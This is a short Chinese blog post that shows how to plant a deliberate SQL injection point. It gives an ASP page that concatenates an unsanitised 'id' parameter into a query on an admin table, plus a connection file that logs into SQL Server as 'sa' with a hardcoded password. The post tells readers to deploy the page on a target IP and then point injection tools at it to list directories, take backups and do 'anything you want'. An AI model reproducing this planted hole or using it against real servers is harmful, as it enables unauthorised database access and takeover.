| 关键词: 小毅 然后 admin 局限性 备份 asp id 这句话 面的 虽然 |
小毅's Blog 小毅:虽然能构建注入,但是存在局限性的! <!--#include file="conn.asp"--><%dim rs,strSQL,idset rs=server.createobject("ADODB.recordset")id = request("id")strSQL = "select * from admin where id=" & idrs.open strSQL,conn,1,3rs.close%>把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。 然后输入:http://目标IP/zhuru.asp?id=1 就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的! -----------------------------conn.asp文件代码:<%strSQLServerName = "127.0.0.1" '服务器名称或地址strSQLDBUserName = "sa" '数据库帐号strSQLDBPassword = "123456789" '数据库密码strSQLDBName = "db_database" '数据库名称Set conn = Server.CreateObject("ADODB.Connection")strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"conn.open strCon%> |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|